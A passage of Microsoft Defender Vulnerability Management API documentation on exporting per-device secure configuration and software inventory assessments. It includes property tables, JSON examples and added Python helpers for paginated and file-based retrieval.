IsExpectedUserImpact | bool | Indicates whether there will be user impact if the configuration is applied | true
OSPlatform | string | Platform of the operating system running on the device. This indicates specific operating systems, including variations within the same family, such as Windows 10 and Windows 11. See Microsoft Defender Vulnerability Management (MDVM) supported operating systems and platforms for details. | Windows10 and Windows 11
RbacGroupName | string | The role-based access control (RBAC) group. If this device is not assigned to any RBAC group, the value will be "Unassigned." If the organization doesn't contain any RBAC groups, the value will be "None." | Servers
RecommendationReference | string | A reference to the recommendation ID related to this software. | sca-_-scid-20000
Timestamp | string | Last time the configuration was seen on the device | 2020-11-03 10:13:34.8476880

1.6 Examples
1.6.1 Request example

HTTP

GET https://api.securitycenter.microsoft.com/api/machines/SecureConfigurationsAssessmentByMachine?pageSize=5

1.6.2 Response example

JSON

{
  "@odata.context": "api.securitycenter.microsoft.com/api/$metadata#Collection(microsoft.windowsDefenderATP.api.AssetConfiguration)",
  "value": [
    {
      "deviceId": "00013ee62c6b12345b10214e1801b217b50ab455c293d",
      "rbacGroupName": "hhh",
      "deviceName": "ComputerPII_5d96860d69c73fdd06fc8d1679e1eb73eceb8330",
      "osPlatform": "Windows10",
      "osVersion": "NT kernel 6.x",
      "timestamp": "2021-01-11 09:47:58.854",
      "configurationId": "scid-10000",
      "configurationCategory": "Network",
      "configurationSubcategory": "",
      "configurationImpact": 5,
      "isCompliant": true,
      "isApplicable": true,
      "isExpectedUserImpact": false,
      "configurationName": "Disable insecure administration protocol - Telnet",
      "recommendationReference": "sca-_-scid-10000"
    },
    {
      "deviceId": "0002a1be533813b9a8c6de739785365bce7910",
      "rbacGroupName": "hhh",
      "deviceName": null,
      "osPlatform": "Windows10",
      "osVersion": "10.0",
      "timestamp": "2021-01-11 09:47:58.854",
      "configurationId": "scid-20000",
      "configurationCategory": "Security controls",
      "configurationSubcategory": "Onboard Devices",
      "configurationImpact": 9,
      "isCompliant": false,
      "isApplicable": true,
      "isExpectedUserImpact": false,
      "configurationName": "Onboard devices to Microsoft Defender for Endpoint",
      "recommendationReference": "sca-_-scid-20000"
    },
    {
      "deviceId": "0002a1de123456a8c06de736785395d4ce7610",
      "rbacGroupName": "hhh",
      "deviceName": null,
      "osPlatform": "Windows10",
      "osVersion": "10.0",
      "timestamp": "2021-01-11 09:47:58.854",
      "configurationId": "scid-10000",
      "configurationCategory": "Network",
      "configurationSubcategory": "",
      "configurationImpact": 5,
      "isCompliant": true,
      "isApplicable": true,
      "isExpectedUserImpact": false,
      "configurationName": "Disable insecure administration protocol - Telnet",
      "recommendationReference": "sca-_-scid-10000"
    },
    {
      "deviceId": "00044f912345bdaf756492dbe6db733b6a9c59ab4",
      "rbacGroupName": "hhh",
      "deviceName": "ComputerPII_18663d45912eed224b2be2f5ea3142726e63f16a.DomainPII_21eeb80b086e76bdfa178eadfa25e8de9acfa346.corp.contoso.com",
      "osPlatform": "Windows10",
      "osVersion": "10.0.17763.1637",
      "timestamp": "2021-01-11 09:47:58.854",
      "configurationId": "scid-39",
      "configurationCategory": "OS",
      "configurationSubcategory": "",
      "configurationImpact": 5,
      "isCompliant": true,
      "isApplicable": true,
      "isExpectedUserImpact": false,
      "configurationName": "Enable 'Domain member: Digitally sign secure channel data (when possible)'",
      "recommendationReference": "sca-_-scid-39"
    },
    {
      "deviceId": "00044f912345daf759462bde6bd733d6a9c56ab4",
      "rbacGroupName": "hhh",
      "deviceName": "ComputerPII_18663b45612eeb224d2de2f5ea3142726e63f16a.DomainPII_21eed80d086e76dbfa178eadfa25e8be9acfa346.corp.contoso.com",
      "osPlatform": "Windows10",
      "osVersion": "10.0.17763.1637",
      "timestamp": "2021-01-11 09:47:58.854",
      "configurationId": "scid-6093",
      "configurationCategory": "Security controls",
      "configurationSubcategory": "Antivirus",
      "configurationImpact": 5,
      "isCompliant": false,
      "isApplicable": false,
      "isExpectedUserImpact": false,
      "configurationName": "Enable Microsoft Defender Antivirus real-time behavior monitoring for Linux",
      "recommendationReference": "sca-_-scid-6093"
    }
  ],
  "@odata.nextLink": "https://api.securitycenter.microsoft.com/api/machines/SecureConfigurationsAssessmentByMachine?pagesize=5&$skiptoken=eyJFeHBvcnREZWZpbml0aW9uIjp7IlRpbWVQYXRoIjoiMjAyMS0wMS0xMS8xMTAxLyJ9LCJFeHBvcnRGaWxlSW5kZXgiOjAsIkxpbmVTdG9wcGVkQXQiOjV9"
}
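The paged JSON retrieval described above (follow @odata.nextLink until it is absent, never $top) is easiest to see in code. The following Python is an added example, not code from the Microsoft documentation: it walks the pages and reduces the records to the applicable, non-compliant configurations per device, which is the subset an operator actually needs to act on. The HTTP call is injected as a function so the block runs offline against constructed pages; make_http_fetch shows the real variant (an authenticated GET with a bearer token obtained outside this example). All device and configuration ids in the sample pages are invented, and the skiptoken value is a placeholder.

```python
import json
from typing import Callable, Dict, Iterable, Iterator, List, Set

BASE_URL = "https://api.securitycenter.microsoft.com"
ENDPOINT = "/api/machines/SecureConfigurationsAssessmentByMachine"


def make_http_fetch(bearer_token: str) -> Callable[[str], dict]:
    """Build a real fetcher: an authenticated GET that returns the decoded JSON body.

    The token is an OAuth access token for the Defender for Endpoint API; acquiring it
    (app registration, client-credentials flow) is outside this example.
    """
    import urllib.request

    def fetch(url: str) -> dict:
        req = urllib.request.Request(
            url, headers={"Authorization": f"Bearer {bearer_token}", "Accept": "application/json"}
        )
        with urllib.request.urlopen(req, timeout=60) as resp:
            return json.loads(resp.read().decode("utf-8"))

    return fetch


def iter_assessment(fetch_json: Callable[[str], dict], page_size: int = 50000) -> Iterator[dict]:
    """Yield every record of the export, following @odata.nextLink until it is absent.

    pageSize (not $top) is used on purpose: $top suppresses @odata.nextLink and would
    silently truncate the export to a single page.
    """
    url = f"{BASE_URL}{ENDPOINT}?pageSize={page_size}"
    seen: Set[str] = set()  # defensive: a repeated nextLink would otherwise loop forever
    while url:
        if url in seen:
            raise RuntimeError(f"pagination loop detected at {url}")
        seen.add(url)
        page = fetch_json(url)
        for record in page.get("value", []):
            yield record
        url = page.get("@odata.nextLink")


def noncompliant_by_device(records: Iterable[dict]) -> Dict[str, List[str]]:
    """Map deviceId -> sorted configurationIds that apply to the device but are not compliant.

    Rows with isApplicable == false are skipped: a non-compliant but inapplicable control
    (for example a Linux-only control reported for a Windows device) is not a finding.
    """
    found: Dict[str, Set[str]] = {}
    for r in records:
        if r.get("isApplicable") and not r.get("isCompliant"):
            found.setdefault(r["deviceId"], set()).add(r["configurationId"])
    return {device: sorted(ids) for device, ids in found.items()}


# Constructed sample pages (record shape follows the response example above; ids are invented).
_PAGE_1_URL = f"{BASE_URL}{ENDPOINT}?pageSize=2"
_PAGE_2_URL = f"{BASE_URL}{ENDPOINT}?pagesize=2&$skiptoken=CONSTRUCTED-TOKEN"
_SAMPLE_PAGES = {
    _PAGE_1_URL: {
        "value": [
            {"deviceId": "dev-a", "configurationId": "scid-10000", "isCompliant": True, "isApplicable": True},
            {"deviceId": "dev-a", "configurationId": "scid-20000", "isCompliant": False, "isApplicable": True},
        ],
        "@odata.nextLink": _PAGE_2_URL,
    },
    _PAGE_2_URL: {
        "value": [
            {"deviceId": "dev-b", "configurationId": "scid-6093", "isCompliant": False, "isApplicable": False},
            {"deviceId": "dev-b", "configurationId": "scid-39", "isCompliant": False, "isApplicable": True},
        ],
        # no @odata.nextLink: this is the last page
    },
}


def fake_fetch(url: str) -> dict:
    """Offline stand-in for make_http_fetch(): serves the constructed pages by URL."""
    return _SAMPLE_PAGES[url]


def summarise_sample() -> Dict[str, List[str]]:
    """Run the pager over the constructed pages and return the per-device findings."""
    return noncompliant_by_device(iter_assessment(fake_fetch, page_size=2))


def loop_is_detected() -> bool:
    """Show the guard: a page whose nextLink points at itself raises instead of spinning."""
    def self_link(url: str) -> dict:
        return {"value": [], "@odata.nextLink": url}
    try:
        list(iter_assessment(self_link))
    except RuntimeError:
        return True
    return False


if __name__ == "__main__":
    print(json.dumps(summarise_sample(), indent=2))
```

Against the constructed pages the summary is {"dev-a": ["scid-20000"], "dev-b": ["scid-39"]}: the inapplicable scid-6093 row on dev-b is dropped even though it is marked non-compliant. The generator yields records page by page, so the full export is never held in memory, which matters at the 200,000-row maximum page size and the 30 calls per minute limit stated above.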

2. Export secure configuration assessment (via files)

2.1 API method description

This API response contains the Secure Configuration Assessment on your exposed devices, and returns an entry for every unique combination of DeviceId, ConfigurationId.

2.1.1 Limitations
Rate limitations for this API are 5 calls per minute and 20 calls per hour.

2.2 Permissions
One of the following permissions is required to call this API. To learn more, including
how to choose permissions, see Use Microsoft Defender for Endpoint APIs for details.

Permission type | Permission | Permission display name
Application | Vulnerability.Read.All | 'Read Threat and Vulnerability Management vulnerability information'
Delegated (work or school account) | Vulnerability.Read | 'Read Threat and Vulnerability Management vulnerability information'

2.3 URL
HTTP

GET /api/machines/SecureConfigurationsAssessmentExport

2.4 Parameters
sasValidHours: The number of hours that the download URLs will be valid for (maximum 24 hours).

2.5 Properties

Note
The files are gzip compressed and in multiline JSON format.
The download URLs are only valid for 3 hours; otherwise, you can use the sasValidHours parameter.
For maximum download speed of your data, make sure you are downloading from the same Azure region in which your data resides.

Property (ID) | Data type | Description | Example of a returned value
Export files | array[string] | A list of download URLs for files holding the current snapshot of the organization | ["https://tvmexportstrstgeus.blob.core.windows.net/tvm-export...1", "https://tvmexportstrstgeus.blob.core.windows.net/tvm-export...2"]
GeneratedTime | string | The time that the export was generated. | 2021-05-20T08:00:00Z

2.6 Examples
2.6.1 Request example

HTTP

GET https://api.securitycenter.microsoft.com/api/machines/SecureConfigurationsAssessmentExport

2.6.2 Response example

JSON

{
  "@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#contoso.windowsDefenderATP.api.ExportFilesResponse",
  "exportFiles": [
    "https://tvmexportstrstgeus.blob.core.windows.net/tvm-export/2021-01-11/1101/ScaExport/json/OrgId=12345678-195f-4223-9c7a-99fb420fd000/part-00393-e423630d-4c69-4490-8769-a4f5468c4f25.c000.json.gz?sv=2019-12-12&st=2021-01-11T11%3A55%3A51Z&se=2021-01-11T14%3A55%3A51Z&sr=b&sp=r&sig=...",
    "https://tvmexportstrstgeus.blob.core.windows.net/tvm-export/2021-01-11/1101/ScaExport/json/OrgId=12345678-195f-4223-9c7a-99fb420fd000/part-00394-e423630d-4c69-4490-8769-a4f5468c4f25.c000.json.gz?sv=2019-12-12&st=2021-01-11T11%3A55%3A51Z&se=2021-01-11T14%3A55%3A51Z&sr=b&sp=r&sig=...",
    "https://tvmexportstrstgeus.blob.core.windows.net/tvm-export/2021-01-11/1101/ScaExport/json/OrgId=12345678-195f-4223-9c7a-99fb420fd000/part-00394-e423630d-4c69-4490-8769-a4f5468c4f25.c001.json.gz?sv=2019-12-12&st=2021-01-11T11%3A55%3A51Z&se=2021-01-11T14%3A55%3A51Z&sr=b&sp=r&sig=..."
  ],
  "generatedTime": "2021-01-11T11:01:00Z"
}
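For the via-files variant, here is an added Python example (not the documentation's own code) that consumes an ExportFilesResponse like the one above: it refuses a download URL whose SAS expiry (the se query parameter) has already passed, so a long-running job fails with a clear message instead of an opaque storage error, then streams each gzip-compressed, newline-delimited JSON file record by record. The download is injected so the block runs offline against gzip data built in memory; the sample URLs use a placeholder host and signature, and only the se timestamp is taken from the response example. make_http_download shows the real variant, which sends no bearer token because the SAS URL carries its own authorization.

```python
import gzip
import io
import json
from datetime import datetime, timezone
from typing import Callable, Iterator, List, Optional
from urllib.parse import parse_qs, urlparse


def sas_expiry(url: str) -> datetime:
    """Return the expiry encoded in the SAS 'se' (signed expiry) query parameter of a download URL."""
    params = parse_qs(urlparse(url).query)
    se = params["se"][0]  # parse_qs percent-decodes, e.g. 2021-01-11T14:55:51Z
    return datetime.strptime(se, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def iter_export_records(
    export_response: dict,
    download: Callable[[str], bytes],
    now: Optional[datetime] = None,
) -> Iterator[dict]:
    """Yield every record from an ExportFilesResponse.

    Each file is gzip-compressed, newline-delimited JSON (one record per line). The SAS
    expiry is checked before each download; on expiry, call the export API again (or
    request a longer window with sasValidHours) to obtain fresh URLs.
    """
    now = now or datetime.now(timezone.utc)
    for url in export_response["exportFiles"]:
        if sas_expiry(url) <= now:
            raise RuntimeError("export download URL has expired; request a new export")
        with gzip.open(io.BytesIO(download(url)), "rt", encoding="utf-8") as fh:
            for line in fh:
                line = line.strip()
                if line:  # tolerate a trailing newline or blank lines
                    yield json.loads(line)


def make_http_download() -> Callable[[str], bytes]:
    """Real downloader: the SAS URL authorizes the request itself, so no API token is sent."""
    import urllib.request

    def download(url: str) -> bytes:
        with urllib.request.urlopen(url, timeout=300) as resp:
            return resp.read()

    return download


# Constructed sample: two gzip files, placeholder host/signature, se taken from the example above.
_SAS = "?sv=2019-12-12&st=2021-01-11T11%3A55%3A51Z&se=2021-01-11T14%3A55%3A51Z&sr=b&sp=r&sig=CONSTRUCTED"
_FILES = {
    "https://example.invalid/tvm-export/part-00000.json.gz" + _SAS: [
        {"deviceId": "dev-a", "configurationId": "scid-10000", "isCompliant": True, "isApplicable": True},
        {"deviceId": "dev-a", "configurationId": "scid-20000", "isCompliant": False, "isApplicable": True},
    ],
    "https://example.invalid/tvm-export/part-00001.json.gz" + _SAS: [
        {"deviceId": "dev-b", "configurationId": "scid-39", "isCompliant": False, "isApplicable": True},
    ],
}
SAMPLE_RESPONSE = {"exportFiles": list(_FILES), "generatedTime": "2021-01-11T11:01:00Z"}


def fake_download(url: str) -> bytes:
    """Offline stand-in: gzip the constructed records as newline-delimited JSON."""
    body = "".join(json.dumps(r) + "\n" for r in _FILES[url])
    return gzip.compress(body.encode("utf-8"))


def load_sample(now: datetime = datetime(2021, 1, 11, 12, 0, tzinfo=timezone.utc)) -> List[dict]:
    """Load all records from the constructed export at a fixed clock inside the SAS window."""
    return list(iter_export_records(SAMPLE_RESPONSE, fake_download, now=now))


def expired_sample_raises() -> bool:
    """Same export read after the SAS window has closed: the guard refuses to download."""
    try:
        load_sample(now=datetime(2021, 1, 11, 15, 0, tzinfo=timezone.utc))
    except RuntimeError:
        return True
    return False


if __name__ == "__main__":
    records = load_sample()
    print(len(records), "records; non-compliant:",
          [r["configurationId"] for r in records if not r["isCompliant"]])
```

Because the export is a point-in-time snapshot, a practitioner keeping history would write each record out together with generatedTime from the response rather than the download time, so that later comparisons line up with the snapshot the service actually produced.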

See also
Export assessment methods and properties per device
Export software inventory assessment per device
Export software vulnerabilities assessment per device

Other related

Microsoft Defender Vulnerability Management


Vulnerabilities in your organization

Export software inventory assessment per device
Article • 09/27/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender Vulnerability Management
Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

This API returns all the data for installed software that has a Common Platform Enumeration (CPE), on a per-device basis.

Different API calls get different types of data. Because the amount of data can be large, there are two ways it can be retrieved:

Export software inventory assessment JSON response: The API pulls all data in your organization as JSON responses. This method is best for small organizations with fewer than 100K devices. The response is paginated, so you can use the @odata.nextLink field from the response to fetch the next results.

Export software inventory assessment via files: This API solution enables pulling larger amounts of data faster and more reliably. So, it's recommended for large organizations with more than 100K devices. This API pulls all data in your organization as download files. The response contains URLs to download all the data from Azure Storage. This API enables you to download all your data from Azure Storage as follows:

  1. Call the API to get a list of download URLs with all your organization data.
  2. Download all the files using the download URLs and process the data as you like.

Data that is collected (using either JSON response or via files) is the current snapshot of the current state. It doesn't contain historic data. To collect historic data, customers must save the data in their own data storage.

Note
Unless indicated otherwise, all export assessment methods listed are full exports and by device (also referred to as per device).

1. Export software inventory assessment (JSON response)

1.1 API method description

This API response contains all the data of installed software that has a Common Platform Enumeration (CPE), per device. Returns a table with an entry for every unique combination of DeviceId, SoftwareVendor, SoftwareName, SoftwareVersion.

1.1.1 Limitations
Maximum page size is 200,000.
Rate limitations for this API are 30 calls per minute and 1000 calls per hour.

1.2 Permissions
One of the following permissions is required to call this API. To learn more, including how to choose permissions, see Use Microsoft
Defender for Endpoint APIs for details.

Permission type | Permission | Permission display name
Application | Software.Read.All | 'Read Threat and Vulnerability Management software information'
Delegated (work or school account) | Software.Read | 'Read Threat and Vulnerability Management software information'

1.3 URL
HTTP

GET /api/machines/SoftwareInventoryByMachine

1.4 Parameters
pageSize (default = 50,000): Number of results in response.
$top: Number of results to return (doesn't return @odata.nextLink and therefore doesn't pull all the data)

1.5 Properties

Note
Each record is approximately 0.5KB of data. You should take this into account when choosing the correct pageSize parameter for you.
The properties defined in the following table are listed alphabetically, by property ID. When running this API, the resulting output will not necessarily be returned in the same order listed in this table.
Some additional columns might be returned in the response. These columns are temporary and might be removed; please use only the documented columns.

Property (ID) | Data type | Description | Example of a returned value
DeviceId | string | Unique identifier for the device in the service. | 9eaf3a8b5962e0e6b1af9ec756664a9b823df2d1
DeviceName | string | Fully qualified domain name (FQDN) of the device. | johnlaptop.europe.contoso.com
DiskPaths | Array[string] | Disk evidence that the product is installed on the device. | ["C:\Program Files (x86)\Microsoft\Silverlight\Application\silverlight.exe"]
EndOfSupportDate | string | The date in which support for this software has or will end. | 2020-12-30
EndOfSupportStatus | string | End of support status. Can contain these possible values: None, EOS Version, Upcoming EOS Version, EOS Software, Upcoming EOS Software. | Upcoming EOS
NumberOfWeaknesses | int | Number of weaknesses on this software on this device | 3
OSPlatform | string | Platform of the operating system running on the device. These are specific operating systems with variations within the same family, such as Windows 10 and Windows 11. See Microsoft Defender Vulnerability Management supported operating systems and platforms for details. | Windows10 and Windows 11
RbacGroupName | string | The role-based access control (RBAC) group. If this device is not assigned to any RBAC group, the value will be "Unassigned." If the organization doesn't contain any RBAC groups, the value will be "None." | Servers
RegistryPaths | Array[string] | Registry evidence that the product is installed in the device. | ["HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\M Silverlight"]
SoftwareFirstSeenTimestamp | string | The first time this software was seen on the device. | 2019-04-07 02:06:47
SoftwareName | string | Name of the software product. | Silverlight
SoftwareVendor | string | Name of the software vendor. | microsoft
SoftwareVersion | string | Version number of the software product. | 81.0.4044.138

1.6 Examples
1.6.1 Request example

HTTP

GET https://api.securitycenter.microsoft.com/api/machines/SoftwareInventoryByMachine?pageSize=5&sinceTime=2021-05-19T18%3A35%3A49.924Z

1.6.2 Response example

JSON

{
  "@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#Collection(contoso.windowsDefenderATP.api.AssetSoftware)",
  "value": [
    {
      "deviceId": "00044f68765bbaf712342dbe6db733b6a9c59ab4",
      "rbacGroupName": "hhh",
      "deviceName": "ComputerPII_18993b45912eeb224b2be2f5ea3142726e63f16a.DomainPII_21eeb80d086e79dbfa178eadfa25e8de9acfa346.corp.contoso.com",
      "osPlatform": "Windows10",
      "softwareVendor": "microsoft",
      "softwareName": "windows_10",
      "softwareVersion": "10.0.17763.1637",
      "numberOfWeaknesses": 58,
      "diskPaths": [],
      "registryPaths": [],
      "softwareFirstSeenTimestamp": "2020-12-30 11:07:15",
      "endOfSupportStatus": "Upcoming EOS Version",
      "endOfSupportDate": "2021-05-11T00:00:00+00:00"
    },
    {
      "deviceId": "00044f68765bbaf712342dbe6db733b6a9c59ab4",
      "rbacGroupName": "hhh",
      "deviceName": "ComputerPII_18993b45912eeb224b2be2f5ea3142726e63f16a.DomainPII_21eeb80d086e79dbfa178eadfa25e8de9acfa346.corp.contoso.com",
      "osPlatform": "Windows10",
      "softwareVendor": "microsoft",
      "softwareName": ".net_framework",
      "softwareVersion": "4.0.0.0",
      "numberOfWeaknesses": 0,
      "diskPaths": [],
      "registryPaths": [
        "SOFTWARE\\Microsoft\\NET Framework Setup\\NDP\\v4.0\\Client\\Install"
      ],
      "softwareFirstSeenTimestamp": "2020-12-30 11:07:15",
      "endOfSupportStatus": "None",
      "endOfSupportDate": null
    },
    {
      "deviceId": "00044f68765bbaf712342dbe6db733b6a9c59ab4",
      "rbacGroupName": "hhh",
      "deviceName": "ComputerPII_18993b45912eeb224b2be2f5ea3142726e63f16a.DomainPII_21eed80d086e79bdfa178eadfa25e8de9acfa346.corp.contoso.com",
      "osPlatform": "Windows10",
      "softwareVendor": "microsoft",
      "softwareName": "system_center_2012_endpoint_protection",
      "softwareVersion": "4.7.214.0",
      "numberOfWeaknesses": 0,
      "diskPaths": [],
      "registryPaths": [
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Microsoft Security Client"
      ],
      "softwareFirstSeenTimestamp": "2020-12-30 11:07:15",
      "endOfSupportStatus": "None",
      "endOfSupportDate": null
    },
    {
      "deviceId": "00044f68765ddaf71234bde6bd733d6a9c59ad4",
      "rbacGroupName": "hhh",
      "deviceName": "ComputerPII_18993b45912eeb224b2be2f5ea3142726e63f16a.DomainPII_21eeb80d086e79dbfa178aedfa25e8be9acfa346.corp.contoso.com",
      "osPlatform": "Windows10",
      "softwareVendor": "microsoft",
      "softwareName": "configuration_manager",
      "softwareVersion": "5.0.8634.1000",
      "numberOfWeaknesses": 0,
      "diskPaths": [],
      "registryPaths": [
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{B7D3A842-E826-4542-B39B-1D883264B279}"
      ],
      "softwareFirstSeenTimestamp": "2020-12-30 11:07:15",
      "endOfSupportStatus": "None",
      "endOfSupportDate": null
    },
    {
      "deviceId": "00044f38765bbaf712342dbe6db733b6a9c59ab4",
      "rbacGroupName": "hhh",
      "deviceName": "ComputerPII_18993b45912eeb224b2de2f5ea3142726e63f16a.DomainPII_21eeb80d086e79bdfa178eadfa25e8be9acfa346.corp.contoso.com",
      "osPlatform": "Windows10",
      "softwareVendor": "microsoft",
      "softwareName": "system_center_2012_endpoint_protection",
      "softwareVersion": "4.10.209.0",
      "numberOfWeaknesses": 0,
      "diskPaths": [],
      "registryPaths": [
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Microsoft Security Client"
      ],
      "softwareFirstSeenTimestamp": "2020-12-30 11:07:15",
      "endOfSupportStatus": "None",
      "endOfSupportDate": null
    }
  ],
  "@odata.nextLink": "https://api.securitycenter.microsoft.com/api/machines/SoftwareInventoryByMachine?pagesize=5&$skiptoken=eyJFeHBvcnREZWZpbml0aW9uIjp7IlRpbWVQYXRoIjoiMjAyMS0wMS0yNS8wMjAwLyJ9LCJFeHBvcnRGaWxlSW5kZXgiOjAsIkxpbmVTdG9wcGVkQXQiOjV9"
}

Note
The information returned by this API, along with the information returned by the Export non product code software inventory assessment API, for software that doesn't have a CPE, gives you full visibility into the software installed across your organization and the devices it's installed on.

2. Export software inventory assessment (via files)

2.1 API method description

This API response contains all the data of installed software per device. Returns a table with an entry for every unique combination of DeviceId, SoftwareVendor, SoftwareName, SoftwareVersion.

2.1.1 Limitations
Rate limitations for this API are 5 calls per minute and 20 calls per hour.

2.2 Permissions
One of the following permissions is required to call this API. To learn more, including how to choose permissions, see Use Microsoft
Defender for Endpoint APIs for details.

Permission type | Permission | Permission display name
Application | Software.Read.All | 'Read Threat and Vulnerability Management software information'
Delegated (work or school account) | Software.Read | 'Read Threat and Vulnerability Management software information'

2.3 URL
HTTP

GET /api/machines/SoftwareInventoryExport

2.4 Parameters
sasValidHours: The number of hours that the download URLs will be valid for (maximum 24 hours).

2.5 Properties

Note
The files are gzip compressed and in multiline JSON format.
The download URLs are only valid for 3 hours; otherwise, you can use the sasValidHours parameter.
For maximum download speed of your data, make sure you are downloading from the same Azure region in which your data resides.

Property (ID) | Data type | Description | Example of a returned value
Export files | array[string] | A list of download URLs for files holding the current snapshot of the organization | ["https://tvmexportstrstgeus.blob.core.windows.net/tvm-export...1", "https://tvmexportstrstgeus.blob.core.windows.net/tvm-export...2"]
GeneratedTime | string | The time that the export was generated. | 2021-05-20T08:00:00Z

2.6 Examples

2.6.1 Request example

HTTP

GET https://api.securitycenter.microsoft.com/api/machines/SoftwareInventoryExport

2.6.2 Response example

JSON

{
  "@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#microsoft.windowsDefenderATP.api.ExportFilesResponse",
  "exportFiles": [
    "https://tvmexportstrstgeus.blob.core.windows.net/tvm-export/2021-01-11/1101/SoftwareInventory/json/OrgId=12345678-195f-4223-9c7a-99fb420fd000/part-00393-e423630d-4c69-4490-8769-a4f5468c4f25.c000.json.gz?sv=2019-12-12&st=2021-01-11T11%3A55%3A51Z&se=2021-01-11T14%3A55%3A51Z&sr=b&sp=r&sig=...",
    "https://tvmexportstrstgeus.blob.core.windows.net/tvm-export/2021-01-11/1101/SoftwareInventory/json/OrgId=12345678-195f-4223-9c7a-99fb420fd000/part-00394-e423630d-4c69-4490-8769-a4f5468c4f25.c000.json.gz?sv=2019-12-12&st=2021-01-11T11%3A55%3A51Z&se=2021-01-11T14%3A55%3A51Z&sr=b&sp=r&sig=...",
    "https://tvmexportstrstgeus.blob.core.windows.net/tvm-export/2021-01-11/1101/SoftwareInventory/json/OrgId=12345678-195f-4223-9c7a-99fb420fd000/part-00394-e423630d-4c69-4490-8769-a4f5468c4f25.c001.json.gz?sv=2019-12-12&st=2021-01-11T11%3A55%3A51Z&se=2021-01-11T14%3A55%3A51Z&sr=b&sp=r&sig=..."
  ],
  "generatedTime": "2021-01-11T11:01:00Z"
}

See also
Export assessment methods and properties per device
Export secure configuration assessment per device
Export software vulnerabilities assessment per device
Export non product code software inventory assessment

Other related
Microsoft Defender Vulnerability Management
Vulnerabilities in your organization

Export non product code software inventory assessment per device
Article • 09/27/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender Vulnerability Management
Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

This API returns all the data for installed software that doesn't have a Common Platform Enumeration (CPE), on a per-device basis. The information returned by this API, along with the information returned by the Export software inventory assessment API, for software that does have a CPE, gives you full visibility into the software installed across your organization and the devices it's installed on.

Note
Software products without a CPE are not supported by vulnerability management. They will be shown in the software inventory page, but because CPEs are used by vulnerability management to identify the software and any vulnerabilities, information like exploits, number of exposed devices, and weaknesses won't be available for them. For more information, see Software inventory.

Different API calls get different types of data. Because the amount of data can be large, there are two ways it can be retrieved:

Export non product code software inventory assessment JSON response: The API pulls all data in your organization as JSON responses. This method is best for small organizations with fewer than 100K devices. The response is paginated, so you can use the @odata.nextLink field from the response to fetch the next results.

Export non product code software inventory assessment via files: This API solution enables pulling larger amounts of data faster and more reliably. So, it's recommended for large organizations with more than 100K devices. This API pulls all data in your organization as download files. The response contains URLs to download all the data from Azure Storage. This API enables you to download all your data from Azure Storage as follows:

  1. Call the API to get a list of download URLs with all your organization data.
  2. Download all the files using the download URLs and process the data as you like.

Data that is collected (using either JSON response or via files) is the current snapshot of the current state. It doesn't contain historic data. To collect historic data, customers must save the data in their own data storage.

Note
Unless indicated otherwise, all export assessment methods listed are full exports and by device (also referred to as per device).

1. Export non product code software inventory assessment (JSON response)

1.1 API method description

This API response contains all the data of installed software that does not have a Common Platform Enumeration (CPE) per device. Returns a table with an entry for every unique combination of DeviceId, SoftwareVendor, SoftwareName, SoftwareVersion.

1.1.1 Limitations
Maximum page size is 200,000.
Rate limitations for this API are 30 calls per minute and 1000 calls per hour.

1.2 Permissions
One of the following permissions is required to call this API. To learn more, including
how to choose permissions, see Use Microsoft Defender for Endpoint APIs for details.

Permission type | Permission | Permission display name
Application | Software.Read.All | 'Read Threat and Vulnerability Management software information'
Delegated (work or school account) | Software.Read | 'Read Threat and Vulnerability Management software information'

1.3 URL
HTTP

GET /api/machines/SoftwareInventoryNoProductCodeByMachine

1.4 Parameters
pageSize (default = 50,000): Number of results in response.
$top: Number of results to return (doesn't return @odata.nextLink and therefore
doesn't pull all the data)

1.5 Properties

Note
Each record is approximately 0.5KB of data. You should take this into account when choosing the correct pageSize parameter for you.
The properties defined in the following table are listed alphabetically, by property ID. When running this API, the resulting output will not necessarily be returned in the same order listed in this table.
Some additional columns might be returned in the response. These columns are temporary and might be removed; please use only the documented columns.

Property (ID) | Data type | Description
DeviceId | string | Unique identifier for the device in the service.
DeviceName | string | Fully qualified domain name (FQDN) of the device.
OSPlatform | string | Platform of the operating system running on the device. These are specific operating systems with variations within the same family, such as Windows 10 and Windows 11. See Supported operating systems, platforms and capabilities for details.
RbacGroupName | string | The role-based access control (RBAC) group. If this device is not assigned to any RBAC group, the value will be "Unassigned." If the organization doesn't contain any RBAC groups, the value will be "None."
RbacGroupId | string | The role-based access control (RBAC) group ID.
SoftwareLastSeenTimestamp | string | The last time this software was seen on the device.
SoftwareName | string | Name of the software product.
SoftwareVendor | string | Name of the software vendor.
SoftwareVersion | string | Version number of the software product.

1.6 Examples

1.6.1 Request example

HTTP

GET https://api.securitycenter.microsoft.com/api/machines/SoftwareInventoryNoProductCodeByMachine?pageSize=3&sinceTime=2021-05-19

1.6.2 Response example

JSON

{
  "@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#Collection(microsoft.windowsDefenderATP.api.AssetNonCpeSoftware)",
  "value": [
    {
      "deviceId": "1234512345123451234512345",
      "rbacGroupId": 11,
      "rbacGroupName": "London",
      "deviceName": "Device1",
      "osPlatform": "Windows11",
      "softwareVendor": "microsoft",
      "softwareName": "vs_communitymsi",
      "softwareVersion": "11.11.31111.1",
      "softwareLastSeenTimestamp": "2021-01-30 11:31:12.271"
    },
    {
      "deviceId": "232323232323232322323232323",
      "rbacGroupId": 23,
      "rbacGroupName": "Tokyo",
      "deviceName": "Device23",
      "osPlatform": "Windows10",
      "softwareVendor": "intel",
      "softwareName": "intel®_software_installer",
      "softwareVersion": "22.20.2.2",
